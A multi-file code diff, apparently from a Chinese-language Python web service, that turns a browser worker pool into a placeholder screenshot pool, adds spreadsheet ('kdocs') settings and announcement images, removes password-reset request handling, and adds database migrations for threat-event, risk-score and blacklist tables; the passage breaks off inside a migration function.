HONEYPOT_ENABLED = os.environ.get('HONEYPOT_ENABLED', 'true').lower() == 'true'
AUTO_BAN_ENABLED = os.environ.get('AUTO_BAN_ENABLED', 'true').lower() == 'true'
@classmethod
def validate(cls):
@@ -234,6 +244,9 @@ class Config:
if cls.LOG_LEVEL not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']:
errors.append(f"LOG_LEVEL无效: {cls.LOG_LEVEL}")
if cls.SECURITY_LOG_LEVEL not in ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']:
errors.append(f"SECURITY_LOG_LEVEL无效: {cls.SECURITY_LOG_LEVEL}")
return errors
@classmethod

View File

@@ -1,42 +1,22 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""浏览器池管理 - 工作线程池模式(真正的浏览器复用"""
"""截图线程池管理 - 工作线程池模式(并发执行截图任务"""
import os
import threading
import queue
import time
from typing import Callable, Optional, Dict, Any
import nest_asyncio
_NEST_ASYNCIO_APPLIED = False
_NEST_ASYNCIO_LOCK = threading.Lock()
def _apply_nest_asyncio_once() -> None:
"""按需应用 nest_asyncio避免 import 时产生全局副作用。"""
global _NEST_ASYNCIO_APPLIED
if _NEST_ASYNCIO_APPLIED:
return
with _NEST_ASYNCIO_LOCK:
if _NEST_ASYNCIO_APPLIED:
return
try:
nest_asyncio.apply()
except Exception:
pass
_NEST_ASYNCIO_APPLIED = True
# 安全修复: 将魔法数字提取为可配置常量
BROWSER_IDLE_TIMEOUT = int(os.environ.get('BROWSER_IDLE_TIMEOUT', '300')) # 空闲超时(秒)默认5分钟
TASK_QUEUE_TIMEOUT = int(os.environ.get('TASK_QUEUE_TIMEOUT', '10')) # 队列获取超时(秒)
TASK_QUEUE_MAXSIZE = int(os.environ.get('BROWSER_TASK_QUEUE_MAXSIZE', '200')) # 队列最大长度(0表示无限制)
BROWSER_MAX_USE_COUNT = int(os.environ.get('BROWSER_MAX_USE_COUNT', '0')) # 每个浏览器最大复用次数(0表示不限制)
BROWSER_MAX_USE_COUNT = int(os.environ.get('BROWSER_MAX_USE_COUNT', '0')) # 每个执行环境最大复用次数(0表示不限制)
class BrowserWorker(threading.Thread):
"""浏览器工作线程 - 每个worker维护自己的浏览器"""
"""截图工作线程 - 每个worker维护自己的执行环境"""
def __init__(
self,
@@ -55,99 +35,61 @@ class BrowserWorker(threading.Thread):
self.total_tasks = 0
self.failed_tasks = 0
self.pre_warm = pre_warm
self.last_activity_ts = 0.0
def log(self, message: str):
"""日志输出"""
if self.log_callback:
self.log_callback(f"[Worker-{self.worker_id}] {message}")
else:
print(f"[浏览器池][Worker-{self.worker_id}] {message}")
print(f"[截图池][Worker-{self.worker_id}] {message}")
def _create_browser(self):
"""创建浏览器实例"""
try:
from playwright.sync_api import sync_playwright
self.log("正在创建浏览器...")
playwright = sync_playwright().start()
browser = playwright.chromium.launch(
headless=True,
args=[
'--no-sandbox',
'--disable-setuid-sandbox',
'--disable-dev-shm-usage',
'--disable-gpu',
]
)
"""创建截图执行环境(逻辑占位,无需真实浏览器"""
created_at = time.time()
self.browser_instance = {
'playwright': playwright,
'browser': browser,
'created_at': time.time(),
'created_at': created_at,
'use_count': 0,
'worker_id': self.worker_id
'worker_id': self.worker_id,
}
self.log(f"浏览器创建成功")
self.last_activity_ts = created_at
self.log("截图执行环境就绪")
return True
except Exception as e:
self.log(f"创建浏览器失败: {e}")
return False
def _close_browser(self):
"""关闭浏览器"""
"""关闭截图执行环境"""
if self.browser_instance:
try:
self.log("正在关闭浏览器...")
if self.browser_instance['browser']:
self.browser_instance['browser'].close()
if self.browser_instance['playwright']:
self.browser_instance['playwright'].stop()
self.log(f"浏览器已关闭(共处理{self.browser_instance['use_count']}个任务)")
except Exception as e:
self.log(f"关闭浏览器时出错: {e}")
finally:
self.log(f"执行环境已释放(共处理{self.browser_instance.get('use_count', 0)}个任务)")
self.browser_instance = None
def _check_browser_health(self) -> bool:
"""检查浏览器是否健康"""
if not self.browser_instance:
return False
try:
return self.browser_instance['browser'].is_connected()
except:
return False
"""检查执行环境是否就绪"""
return bool(self.browser_instance)
def _ensure_browser(self) -> bool:
"""确保浏览器可用(如果不可用则重新创建)"""
"""确保执行环境可用"""
if self._check_browser_health():
return True
# 浏览器不可用,尝试重新创建
self.log("浏览器不可用,尝试重新创建...")
self.log("执行环境不可用,尝试重新创建...")
self._close_browser()
return self._create_browser()
def run(self):
"""工作线程主循环 - 按需启动浏览器模式"""
"""工作线程主循环 - 按需启动执行环境模式"""
if self.pre_warm:
self.log("Worker启动预热模式启动即创建浏览器")
self.log("Worker启动预热模式启动即准备执行环境")
else:
self.log("Worker启动按需模式等待任务时不占用浏览器资源)")
self.log("Worker启动按需模式等待任务时不占用资源")
last_activity_time = 0
if self.pre_warm and not self.browser_instance:
if self._create_browser():
last_activity_time = time.time()
self._create_browser()
self.pre_warm = False
while self.running:
try:
# 允许运行中触发预热(例如池在初始化后调用 warmup
if self.pre_warm and not self.browser_instance:
if self._create_browser():
last_activity_time = time.time()
self._create_browser()
self.pre_warm = False
# 从队列获取任务(带超时,以便能响应停止信号和空闲检查)
@@ -155,11 +97,11 @@ class BrowserWorker(threading.Thread):
try:
task = self.task_queue.get(timeout=TASK_QUEUE_TIMEOUT)
except queue.Empty:
# 检查是否需要关闭空闲的浏览器
if self.browser_instance and last_activity_time > 0:
idle_time = time.time() - last_activity_time
# 检查是否需要释放空闲的执行环境
if self.browser_instance and self.last_activity_ts > 0:
idle_time = time.time() - self.last_activity_ts
if idle_time > BROWSER_IDLE_TIMEOUT:
self.log(f"空闲{int(idle_time)}秒,关闭浏览器释放资源")
self.log(f"空闲{int(idle_time)}秒,释放执行环境")
self._close_browser()
continue
@@ -169,10 +111,37 @@ class BrowserWorker(threading.Thread):
self.log("收到停止信号")
break
# 按需创建或确保浏览器可用
if not self._ensure_browser():
self.log("浏览器不可用,任务失败")
task['callback'](None, "浏览器不可用")
# 按需创建或确保执行环境可用
browser_ready = False
for attempt in range(2):
if self._ensure_browser():
browser_ready = True
break
if attempt < 1:
self.log("执行环境创建失败,重试...")
time.sleep(0.5)
if not browser_ready:
retry_count = int(task.get("retry_count", 0) or 0) if isinstance(task, dict) else 0
if retry_count < 1 and isinstance(task, dict):
task["retry_count"] = retry_count + 1
try:
self.task_queue.put(task, timeout=1)
self.log("执行环境不可用,任务重新入队")
except queue.Full:
self.log("任务队列已满,无法重新入队,任务失败")
callback = task.get("callback")
if callable(callback):
callback(None, "执行环境不可用")
self.total_tasks += 1
self.failed_tasks += 1
continue
self.log("执行环境不可用,任务失败")
callback = task.get("callback") if isinstance(task, dict) else None
if callable(callback):
callback(None, "执行环境不可用")
self.total_tasks += 1
self.failed_tasks += 1
continue
@@ -185,30 +154,30 @@ class BrowserWorker(threading.Thread):
self.total_tasks += 1
self.browser_instance['use_count'] += 1
self.log(f"开始执行任务(第{self.browser_instance['use_count']}使用浏览器")
self.log(f"开始执行任务(第{self.browser_instance['use_count']}执行")
try:
# 将浏览器实例传递给任务函数
# 将执行环境实例传递给任务函数
result = task_func(self.browser_instance, *task_args, **task_kwargs)
callback(result, None)
self.log(f"任务执行成功")
last_activity_time = time.time()
self.last_activity_ts = time.time()
except Exception as e:
self.log(f"任务执行失败: {e}")
callback(None, str(e))
self.failed_tasks += 1
last_activity_time = time.time()
self.last_activity_ts = time.time()
# 任务失败后,检查浏览器健康
# 任务失败后,检查执行环境健康
if not self._check_browser_health():
self.log("任务失败导致浏览器异常,将在下次任务前重建")
self.log("任务失败导致执行环境异常,将在下次任务前重建")
self._close_browser()
# 定期重启浏览器释放Chromium可能累积的内存
# 定期重启执行环境,释放可能累积的资源
if self.browser_instance and BROWSER_MAX_USE_COUNT > 0:
if self.browser_instance.get('use_count', 0) >= BROWSER_MAX_USE_COUNT:
self.log(f"浏览器已复用{self.browser_instance['use_count']}次,重启释放资源")
self.log(f"执行环境已复用{self.browser_instance['use_count']}次,重启释放资源")
self._close_browser()
except Exception as e:
@@ -225,7 +194,7 @@ class BrowserWorker(threading.Thread):
class BrowserWorkerPool:
"""浏览器工作线程池"""
"""截图工作线程池"""
def __init__(self, pool_size: int = 3, log_callback: Optional[Callable] = None):
self.pool_size = pool_size
@@ -241,17 +210,15 @@ class BrowserWorkerPool:
if self.log_callback:
self.log_callback(message)
else:
print(f"[浏览器池] {message}")
print(f"[截图池] {message}")
def initialize(self):
"""初始化工作线程池按需模式默认预热1个浏览器"""
"""初始化工作线程池按需模式默认预热1个执行环境"""
with self.lock:
if self.initialized:
return
_apply_nest_asyncio_once()
self.log(f"正在初始化工作线程池({self.pool_size}个worker按需启动浏览器...")
self.log(f"正在初始化截图线程池({self.pool_size}个worker按需启动执行环境...")
for i in range(self.pool_size):
worker = BrowserWorker(
@@ -264,13 +231,13 @@ class BrowserWorkerPool:
self.workers.append(worker)
self.initialized = True
self.log(f"工作线程池初始化完成({self.pool_size}个worker就绪浏览器将在有任务时按需启动)")
self.log(f"截图线程池初始化完成({self.pool_size}个worker就绪执行环境将在有任务时按需启动)")
# 初始化完成后默认预热1个浏览器,降低容器重启后前几批任务的冷启动开销
# 初始化完成后默认预热1个执行环境,降低容器重启后前几批任务的冷启动开销
self.warmup(1)
def warmup(self, count: int = 1) -> int:
"""预热浏览器池 - 预创建指定数量的浏览器"""
"""预热截图线程池 - 预创建指定数量的执行环境"""
if count <= 0:
return 0
@@ -281,7 +248,7 @@ class BrowserWorkerPool:
with self.lock:
target_workers = list(self.workers[: min(count, len(self.workers))])
self.log(f"预热浏览器池(预创建{len(target_workers)}浏览器...")
self.log(f"预热截图线程池(预创建{len(target_workers)}执行环境...")
for worker in target_workers:
if not worker.browser_instance:
@@ -296,7 +263,7 @@ class BrowserWorkerPool:
time.sleep(0.1)
warmed = sum(1 for w in target_workers if w.browser_instance)
self.log(f"浏览器池预热完成({warmed}浏览器就绪)")
self.log(f"截图线程池预热完成({warmed}执行环境就绪)")
return warmed
def submit_task(self, task_func: Callable, callback: Callable, *args, **kwargs) -> bool:
@@ -319,7 +286,8 @@ class BrowserWorkerPool:
'func': task_func,
'args': args,
'kwargs': kwargs,
'callback': callback
'callback': callback,
'retry_count': 0,
}
try:
@@ -331,18 +299,44 @@ class BrowserWorkerPool:
def get_stats(self) -> Dict[str, Any]:
"""获取线程池统计信息"""
idle_count = sum(1 for w in self.workers if w.idle)
total_tasks = sum(w.total_tasks for w in self.workers)
failed_tasks = sum(w.failed_tasks for w in self.workers)
workers = list(self.workers or [])
idle_count = sum(1 for w in workers if getattr(w, "idle", False))
total_tasks = sum(int(getattr(w, "total_tasks", 0) or 0) for w in workers)
failed_tasks = sum(int(getattr(w, "failed_tasks", 0) or 0) for w in workers)
worker_details = []
for w in workers:
browser_instance = getattr(w, "browser_instance", None)
browser_use_count = 0
browser_created_at = None
if isinstance(browser_instance, dict):
browser_use_count = int(browser_instance.get("use_count", 0) or 0)
browser_created_at = browser_instance.get("created_at")
worker_details.append(
{
"worker_id": getattr(w, "worker_id", None),
"idle": bool(getattr(w, "idle", False)),
"has_browser": bool(browser_instance),
"total_tasks": int(getattr(w, "total_tasks", 0) or 0),
"failed_tasks": int(getattr(w, "failed_tasks", 0) or 0),
"browser_use_count": browser_use_count,
"browser_created_at": browser_created_at,
"last_active_ts": float(getattr(w, "last_activity_ts", 0) or 0),
"thread_alive": bool(getattr(w, "is_alive", lambda: False)()),
}
)
return {
'pool_size': self.pool_size,
'idle_workers': idle_count,
'busy_workers': self.pool_size - idle_count,
'busy_workers': max(0, len(workers) - idle_count),
'queue_size': self.task_queue.qsize(),
'total_tasks': total_tasks,
'failed_tasks': failed_tasks,
'success_rate': f"{(total_tasks - failed_tasks) / total_tasks * 100:.1f}%" if total_tasks > 0 else "N/A"
'success_rate': f"{(total_tasks - failed_tasks) / total_tasks * 100:.1f}%" if total_tasks > 0 else "N/A",
'workers': worker_details,
'timestamp': time.time(),
}
def wait_for_completion(self, timeout: Optional[float] = None):
@@ -381,7 +375,7 @@ _pool_lock = threading.Lock()
def get_browser_worker_pool(pool_size: int = 3, log_callback: Optional[Callable] = None) -> BrowserWorkerPool:
"""获取全局浏览器工作线程池(单例)"""
"""获取全局截图工作线程池(单例)"""
global _global_pool
with _pool_lock:
@@ -393,12 +387,46 @@ def get_browser_worker_pool(pool_size: int = 3, log_callback: Optional[Callable]
def init_browser_worker_pool(pool_size: int = 3, log_callback: Optional[Callable] = None):
"""初始化全局浏览器工作线程池"""
"""初始化全局截图工作线程池"""
get_browser_worker_pool(pool_size=pool_size, log_callback=log_callback)
def _shutdown_pool_when_idle(pool: BrowserWorkerPool) -> None:
try:
pool.wait_for_completion(timeout=60)
except Exception:
pass
try:
pool.shutdown()
except Exception:
pass
def resize_browser_worker_pool(pool_size: int, log_callback: Optional[Callable] = None) -> bool:
"""调整截图线程池并发(新任务走新池,旧池空闲后自动关闭)"""
global _global_pool
try:
target_size = max(1, int(pool_size))
except Exception:
target_size = 1
with _pool_lock:
old_pool = _global_pool
if old_pool and int(getattr(old_pool, "pool_size", 0) or 0) == target_size:
return False
effective_log_callback = log_callback or (getattr(old_pool, "log_callback", None) if old_pool else None)
_global_pool = BrowserWorkerPool(pool_size=target_size, log_callback=effective_log_callback)
_global_pool.initialize()
if old_pool:
threading.Thread(target=_shutdown_pool_when_idle, args=(old_pool,), daemon=True).start()
return True
def shutdown_browser_worker_pool():
"""关闭全局浏览器工作线程池"""
"""关闭全局截图工作线程池"""
global _global_pool
with _pool_lock:
@@ -409,7 +437,7 @@ def shutdown_browser_worker_pool():
if __name__ == '__main__':
# 测试代码
print("测试浏览器工作线程池...")
print("测试截图工作线程池...")
def test_task(browser_instance, url: str, task_id: int):
"""测试任务访问URL"""

View File

@@ -24,15 +24,11 @@ from db.schema import ensure_schema
from db.migrations import migrate_database as _migrate_database
from db.admin import (
admin_reset_user_password,
approve_password_reset,
clean_old_operation_logs,
create_password_reset_request,
ensure_default_admin,
get_hourly_registration_count,
get_pending_password_resets,
get_system_config_raw as _get_system_config_raw,
get_system_stats,
reject_password_reset,
update_admin_password,
update_admin_username,
update_system_config as _update_system_config,
@@ -44,6 +40,7 @@ from db.accounts import (
delete_user_accounts,
get_account,
get_account_status,
get_account_status_batch,
get_user_accounts,
increment_account_login_fail,
reset_account_login_status,
@@ -103,6 +100,7 @@ from db.users import (
get_pending_users,
get_user_by_id,
get_user_by_username,
get_user_kdocs_settings,
get_user_stats,
get_user_vip_info,
get_vip_config,
@@ -111,6 +109,7 @@ from db.users import (
remove_user_vip,
set_default_vip_days,
set_user_vip,
update_user_kdocs_settings,
verify_user,
)
from db.security import record_login_context
@@ -121,7 +120,7 @@ config = get_config()
DB_FILE = config.DB_FILE
# 数据库版本 (用于迁移管理)
DB_VERSION = 12
DB_VERSION = 17
# ==================== 系统配置缓存P1 / O-03 ====================
@@ -190,12 +189,24 @@ def update_system_config(
schedule_weekdays=None,
max_concurrent_per_account=None,
max_screenshot_concurrent=None,
enable_screenshot=None,
proxy_enabled=None,
proxy_api_url=None,
proxy_expire_minutes=None,
auto_approve_enabled=None,
auto_approve_hourly_limit=None,
auto_approve_vip_days=None,
kdocs_enabled=None,
kdocs_doc_url=None,
kdocs_default_unit=None,
kdocs_sheet_name=None,
kdocs_sheet_index=None,
kdocs_unit_column=None,
kdocs_image_column=None,
kdocs_admin_notify_enabled=None,
kdocs_admin_notify_email=None,
kdocs_row_start=None,
kdocs_row_end=None,
):
"""更新系统配置(写入后立即失效缓存)。"""
ok = _update_system_config(
@@ -206,12 +217,24 @@ def update_system_config(
schedule_weekdays=schedule_weekdays,
max_concurrent_per_account=max_concurrent_per_account,
max_screenshot_concurrent=max_screenshot_concurrent,
enable_screenshot=enable_screenshot,
proxy_enabled=proxy_enabled,
proxy_api_url=proxy_api_url,
proxy_expire_minutes=proxy_expire_minutes,
auto_approve_enabled=auto_approve_enabled,
auto_approve_hourly_limit=auto_approve_hourly_limit,
auto_approve_vip_days=auto_approve_vip_days,
kdocs_enabled=kdocs_enabled,
kdocs_doc_url=kdocs_doc_url,
kdocs_default_unit=kdocs_default_unit,
kdocs_sheet_name=kdocs_sheet_name,
kdocs_sheet_index=kdocs_sheet_index,
kdocs_unit_column=kdocs_unit_column,
kdocs_image_column=kdocs_image_column,
kdocs_admin_notify_enabled=kdocs_admin_notify_enabled,
kdocs_admin_notify_email=kdocs_admin_notify_email,
kdocs_row_start=kdocs_row_start,
kdocs_row_end=kdocs_row_end,
)
if ok:
invalidate_system_config_cache()

View File

@@ -140,6 +140,36 @@ def get_account_status(account_id):
return cursor.fetchone()
def get_account_status_batch(account_ids):
"""批量获取账号状态信息"""
account_ids = [str(account_id) for account_id in (account_ids or []) if account_id]
if not account_ids:
return {}
results = {}
chunk_size = 900 # 避免触发 SQLite 绑定参数上限
with db_pool.get_db() as conn:
cursor = conn.cursor()
for idx in range(0, len(account_ids), chunk_size):
chunk = account_ids[idx : idx + chunk_size]
placeholders = ",".join("?" for _ in chunk)
cursor.execute(
f"""
SELECT id, status, login_fail_count, last_login_error
FROM accounts
WHERE id IN ({placeholders})
""",
chunk,
)
for row in cursor.fetchall():
row_dict = dict(row)
account_id = str(row_dict.pop("id", ""))
if account_id:
results[account_id] = row_dict
return results
def delete_user_accounts(user_id):
"""删除用户的所有账号"""
with db_pool.get_db() as conn:
@@ -147,4 +177,3 @@ def delete_user_accounts(user_id):
cursor.execute("DELETE FROM accounts WHERE user_id = ?", (user_id,))
conn.commit()
return cursor.rowcount

View File

@@ -172,6 +172,17 @@ def get_system_config_raw() -> dict:
"auto_approve_enabled": 0,
"auto_approve_hourly_limit": 10,
"auto_approve_vip_days": 7,
"kdocs_enabled": 0,
"kdocs_doc_url": "",
"kdocs_default_unit": "",
"kdocs_sheet_name": "",
"kdocs_sheet_index": 0,
"kdocs_unit_column": "A",
"kdocs_image_column": "D",
"kdocs_admin_notify_enabled": 0,
"kdocs_admin_notify_email": "",
"kdocs_row_start": 0,
"kdocs_row_end": 0,
}
@@ -184,12 +195,24 @@ def update_system_config(
schedule_weekdays=None,
max_concurrent_per_account=None,
max_screenshot_concurrent=None,
enable_screenshot=None,
proxy_enabled=None,
proxy_api_url=None,
proxy_expire_minutes=None,
auto_approve_enabled=None,
auto_approve_hourly_limit=None,
auto_approve_vip_days=None,
kdocs_enabled=None,
kdocs_doc_url=None,
kdocs_default_unit=None,
kdocs_sheet_name=None,
kdocs_sheet_index=None,
kdocs_unit_column=None,
kdocs_image_column=None,
kdocs_admin_notify_enabled=None,
kdocs_admin_notify_email=None,
kdocs_row_start=None,
kdocs_row_end=None,
) -> bool:
"""更新系统配置仅更新DB不做缓存处理"""
allowed_fields = {
@@ -200,12 +223,24 @@ def update_system_config(
"schedule_weekdays",
"max_concurrent_per_account",
"max_screenshot_concurrent",
"enable_screenshot",
"proxy_enabled",
"proxy_api_url",
"proxy_expire_minutes",
"auto_approve_enabled",
"auto_approve_hourly_limit",
"auto_approve_vip_days",
"kdocs_enabled",
"kdocs_doc_url",
"kdocs_default_unit",
"kdocs_sheet_name",
"kdocs_sheet_index",
"kdocs_unit_column",
"kdocs_image_column",
"kdocs_admin_notify_enabled",
"kdocs_admin_notify_email",
"kdocs_row_start",
"kdocs_row_end",
"updated_at",
}
@@ -232,6 +267,9 @@ def update_system_config(
if max_screenshot_concurrent is not None:
updates.append("max_screenshot_concurrent = ?")
params.append(max_screenshot_concurrent)
if enable_screenshot is not None:
updates.append("enable_screenshot = ?")
params.append(enable_screenshot)
if schedule_weekdays is not None:
updates.append("schedule_weekdays = ?")
params.append(schedule_weekdays)
@@ -253,6 +291,39 @@ def update_system_config(
if auto_approve_vip_days is not None:
updates.append("auto_approve_vip_days = ?")
params.append(auto_approve_vip_days)
if kdocs_enabled is not None:
updates.append("kdocs_enabled = ?")
params.append(kdocs_enabled)
if kdocs_doc_url is not None:
updates.append("kdocs_doc_url = ?")
params.append(kdocs_doc_url)
if kdocs_default_unit is not None:
updates.append("kdocs_default_unit = ?")
params.append(kdocs_default_unit)
if kdocs_sheet_name is not None:
updates.append("kdocs_sheet_name = ?")
params.append(kdocs_sheet_name)
if kdocs_sheet_index is not None:
updates.append("kdocs_sheet_index = ?")
params.append(kdocs_sheet_index)
if kdocs_unit_column is not None:
updates.append("kdocs_unit_column = ?")
params.append(kdocs_unit_column)
if kdocs_image_column is not None:
updates.append("kdocs_image_column = ?")
params.append(kdocs_image_column)
if kdocs_admin_notify_enabled is not None:
updates.append("kdocs_admin_notify_enabled = ?")
params.append(kdocs_admin_notify_enabled)
if kdocs_admin_notify_email is not None:
updates.append("kdocs_admin_notify_email = ?")
params.append(kdocs_admin_notify_email)
if kdocs_row_start is not None:
updates.append("kdocs_row_start = ?")
params.append(kdocs_row_start)
if kdocs_row_end is not None:
updates.append("kdocs_row_end = ?")
params.append(kdocs_row_end)
if not updates:
return False
@@ -287,108 +358,6 @@ def get_hourly_registration_count() -> int:
# ==================== 密码重置(管理员) ====================
def create_password_reset_request(user_id: int, new_password: str):
"""创建密码重置申请(存储哈希)"""
with db_pool.get_db() as conn:
cursor = conn.cursor()
password_hash = hash_password_bcrypt(new_password)
cst_time = get_cst_now_str()
try:
cursor.execute(
"""
INSERT INTO password_reset_requests (user_id, new_password_hash, status, created_at)
VALUES (?, ?, 'pending', ?)
""",
(user_id, password_hash, cst_time),
)
conn.commit()
return cursor.lastrowid
except Exception as e:
print(f"创建密码重置申请失败: {e}")
return None
def get_pending_password_resets():
"""获取待审核的密码重置申请列表"""
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT r.id, r.user_id, r.created_at, r.status,
u.username, u.email
FROM password_reset_requests r
JOIN users u ON r.user_id = u.id
WHERE r.status = 'pending'
ORDER BY r.created_at DESC
"""
)
return [dict(row) for row in cursor.fetchall()]
def approve_password_reset(request_id: int) -> bool:
"""批准密码重置申请"""
with db_pool.get_db() as conn:
cursor = conn.cursor()
cst_time = get_cst_now_str()
try:
cursor.execute(
"""
SELECT user_id, new_password_hash
FROM password_reset_requests
WHERE id = ? AND status = 'pending'
""",
(request_id,),
)
result = cursor.fetchone()
if not result:
return False
user_id = result["user_id"]
new_password_hash = result["new_password_hash"]
cursor.execute("UPDATE users SET password_hash = ? WHERE id = ?", (new_password_hash, user_id))
cursor.execute(
"""
UPDATE password_reset_requests
SET status = 'approved', processed_at = ?
WHERE id = ?
""",
(cst_time, request_id),
)
conn.commit()
return True
except Exception as e:
print(f"批准密码重置失败: {e}")
return False
def reject_password_reset(request_id: int) -> bool:
"""拒绝密码重置申请"""
with db_pool.get_db() as conn:
cursor = conn.cursor()
cst_time = get_cst_now_str()
try:
cursor.execute(
"""
UPDATE password_reset_requests
SET status = 'rejected', processed_at = ?
WHERE id = ? AND status = 'pending'
""",
(cst_time, request_id),
)
conn.commit()
return cursor.rowcount > 0
except Exception as e:
print(f"拒绝密码重置失败: {e}")
return False
def admin_reset_user_password(user_id: int, new_password: str) -> bool:
"""管理员直接重置用户密码"""
with db_pool.get_db() as conn:

View File

@@ -6,10 +6,12 @@ import db_pool
from db.utils import get_cst_now_str
def create_announcement(title, content, is_active=True):
def create_announcement(title, content, image_url=None, is_active=True):
"""创建公告(默认启用;启用时会自动停用其他公告)"""
title = (title or "").strip()
content = (content or "").strip()
image_url = (image_url or "").strip()
image_url = image_url or None
if not title or not content:
return None
@@ -22,10 +24,10 @@ def create_announcement(title, content, is_active=True):
cursor.execute(
"""
INSERT INTO announcements (title, content, is_active, created_at, updated_at)
VALUES (?, ?, ?, ?, ?)
INSERT INTO announcements (title, content, image_url, is_active, created_at, updated_at)
VALUES (?, ?, ?, ?, ?, ?)
""",
(title, content, 1 if is_active else 0, cst_time, cst_time),
(title, content, image_url, 1 if is_active else 0, cst_time, cst_time),
)
conn.commit()
return cursor.lastrowid
@@ -129,4 +131,3 @@ def dismiss_announcement_for_user(user_id, announcement_id):
)
conn.commit()
return cursor.rowcount >= 0

View File

@@ -72,6 +72,24 @@ def migrate_database(conn, target_version: int) -> None:
if current_version < 12:
_migrate_to_v12(conn)
current_version = 12
if current_version < 13:
_migrate_to_v13(conn)
current_version = 13
if current_version < 14:
_migrate_to_v14(conn)
current_version = 14
if current_version < 15:
_migrate_to_v15(conn)
current_version = 15
if current_version < 16:
_migrate_to_v16(conn)
current_version = 16
if current_version < 17:
_migrate_to_v17(conn)
current_version = 17
if current_version < 18:
_migrate_to_v18(conn)
current_version = 18
if current_version != int(target_version):
set_current_version(conn, int(target_version))
@@ -519,3 +537,215 @@ def _migrate_to_v12(conn):
cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)")
conn.commit()
def _migrate_to_v13(conn):
"""迁移到版本13 - 安全防护:威胁检测相关表"""
cursor = conn.cursor()
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
threat_type TEXT NOT NULL,
score INTEGER NOT NULL DEFAULT 0,
rule TEXT,
field_name TEXT,
matched TEXT,
value_preview TEXT,
ip TEXT,
user_id INTEGER,
request_method TEXT,
request_path TEXT,
user_agent TEXT,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_created_at ON threat_events(created_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_ip ON threat_events(ip)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_user_id ON threat_events(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_type ON threat_events(threat_type)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_risk_scores (
ip TEXT PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_score ON ip_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_updated_at ON ip_risk_scores(updated_at)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_risk_scores (
user_id INTEGER PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_score ON user_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_updated_at ON user_risk_scores(updated_at)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_blacklist (
ip TEXT PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_active ON ip_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_expires ON ip_blacklist(expires_at)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_signatures (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT UNIQUE NOT NULL,
threat_type TEXT NOT NULL,
pattern TEXT NOT NULL,
pattern_type TEXT DEFAULT 'regex',
score INTEGER DEFAULT 0,
is_active INTEGER DEFAULT 1,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_type ON threat_signatures(threat_type)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_active ON threat_signatures(is_active)")
conn.commit()
def _migrate_to_v14(conn):
"""迁移到版本14 - 安全防护:用户黑名单表"""
cursor = conn.cursor()
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_blacklist (
user_id INTEGER PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)")
conn.commit()
def _migrate_to_v15(conn):
"""迁移到版本15 - 邮件设置:新设备登录提醒全局开关"""
cursor = conn.cursor()
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='email_settings'")
if not cursor.fetchone():
# 邮件表由 email_service.init_email_tables 创建;此处仅做增量字段迁移
return
cursor.execute("PRAGMA table_info(email_settings)")
columns = [col[1] for col in cursor.fetchall()]
changed = False
if "login_alert_enabled" not in columns:
cursor.execute("ALTER TABLE email_settings ADD COLUMN login_alert_enabled INTEGER DEFAULT 1")
print(" ✓ 添加 email_settings.login_alert_enabled 字段")
changed = True
try:
cursor.execute("UPDATE email_settings SET login_alert_enabled = 1 WHERE login_alert_enabled IS NULL")
if cursor.rowcount:
changed = True
except sqlite3.OperationalError:
# 列不存在等情况由上方迁移兜底;不阻断主流程
pass
if changed:
conn.commit()
def _migrate_to_v16(conn):
"""迁移到版本16 - 公告支持图片字段"""
cursor = conn.cursor()
cursor.execute("PRAGMA table_info(announcements)")
columns = [col[1] for col in cursor.fetchall()]
if "image_url" not in columns:
